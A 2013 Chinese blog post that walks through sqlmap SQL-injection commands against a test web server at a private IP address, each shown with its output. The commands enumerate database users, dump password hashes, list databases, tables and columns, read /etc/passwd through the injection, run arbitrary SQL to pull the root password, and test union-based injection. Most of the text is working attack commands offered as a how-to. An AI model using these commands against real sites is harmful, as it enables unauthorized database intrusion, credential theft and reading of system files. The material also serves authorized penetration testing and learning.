CrackKay

与您一同分享精彩的网络世界 -486174组织成员
  博客园 :: 首页 :: 博问 :: 闪存 :: 新随笔 :: 联系 :: 订阅 订阅 :: 管理 ::
常用的获取信息 
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- 
current-db 


current database: 'testdb' 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users 


database management system users [5]: 
[*] 'debian-sys-maint'@'localhost' 
[*] 'root'@'127.0.0.1' 
[*] 'root'@'leboyer' 
[*] 'root'@'localhost' 
[*] 'testuser'@'localhost' 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- 
passwords 


database management system users password hashes: 
[*] debian-sys-maint [1]: 
password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
[*] root [1]: 
password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY 
[*] testuser [1]: 
password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs 


available databases [3]: 
[*] information_schema 
[*] mysql 
[*] testdb 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables 
-D "information_schema" 


Database: information_schema 
[16 tables] 
+---------------------------------------+ 
| CHARACTER_SETS | 
| COLLATION_CHARACTER_SET_APPLICABILITY | 
| COLLATIONS | 
| COLUMN_PRIVILEGES | 
| COLUMNS | 
| KEY_COLUMN_USAGE | 
| ROUTINES | 
| SCHEMA_PRIVILEGES | 
| SCHEMATA | 
| STATISTICS | 
| TABLE_CONSTRAINTS | 
| TABLE_PRIVILEGES | 
| TABLES | 
| TRIGGERS | 
| USER_PRIVILEGES | 
| VIEWS | 
+---------------------------------------+ 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- 
columns -T "user" -D "mysql" 


Database: mysql 
Table: user 
[37 columns] 
+-----------------------+------+ 
| Column | Type | 
+-----------------------+------+ 
| Alter_priv | enum | 
| Alter_routine_priv | enum | 
| Create_priv | enum | 
| Create_routine_priv | enum | 
| Create_tmp_table_priv | enum | 
| Create_user_priv | enum | 
| Create_view_priv | enum | 
| Delete_priv | enum | 
| Drop_priv | enum | 
| Execute_priv | enum | 
| File_priv | enum | 
| Grant_priv | enum | 
| Host | char | 
| Index_priv | enum | 
| Insert_priv | enum | 
| Lock_tables_priv | enum | 
| max_connections | int | 
| max_questions | int | 
| max_updates | int | 
| max_user_connections | int | 
| Password | char | 
| Process_priv | enum | 
| References_priv | enum | 
| Reload_priv | enum | 
| Repl_client_priv | enum | 
| Repl_slave_priv | enum | 
| Select_priv | enum | 
| Show_db_priv | enum | 
| Show_view_priv | enum | 
| Shutdown_priv | enum | 
| ssl_cipher | blob | 
| ssl_type | enum | 
| Super_priv | enum | 
| Update_priv | enum | 
| User | char | 
| x509_issuer | blob | 
| x509_subject | blob | 
+-----------------------+------+ 


13、显示指定的文件内容,一般用于php 
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file / 
etc/passwd 


/etc/passwd: 
--- 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/false 
backup:x:34:34:backup:/var/backups:/bin/sh 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false 
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/ 
bin/bash 
inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash 
--- 


14、执行你自己的sql语句。 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e 
"SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" 


[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM 
mysql.user WHERE user = 'root' LIMIT 0, 1' 
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 
'root' LIMIT 0, 1 
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY 
[hh:mm:19] [INFO] performed 118 queries in 0 seconds 
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 
'YYYYYYYYYYYYYYYY' 


15、union注入 
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union- 
check 


valid union: 'http://192.168.1.47/page.php?id=1UNION ALL SELECT 
NULL, NULL, NULL--&cat=2' 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- 
union-use --banner 


[...] 
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id' 
[hh:mm:24] [INFO] the target url could be affected by an inband sql 
injection vulnerability 
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id' 
[...] 
[hh:mm:24] [INFO] fetching banner 
[hh:mm:24] [INFO] request:http://192.168.1.47/page.php?id=1UNION ALL 
SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), 
CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2 
[hh:mm:24] [INFO] performed 1 queries in 0 seconds 
banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 


16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。 
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b - 
o "sqlmap.log" 


[...] 
[hh:mm:09] [INFO] fetching banner 
[hh:mm:09] [INFO] query: VERSION() 
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log 
[hh:mm:11] [INFO] performed 139 queries in 1 seconds 
banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- 
banner -o "sqlmap.log" --resume 


[...] 
[hh:mm:13] [INFO] fetching banner 
[hh:mm:13] [INFO] query: VERSION() 
[hh:mm:13] [INFO] retrieved the length of query: 26 
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb 
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log 
banner:

 

posted on 2013-04-23 20:48  CrackKay  阅读(152)  评论(0编辑  收藏  举报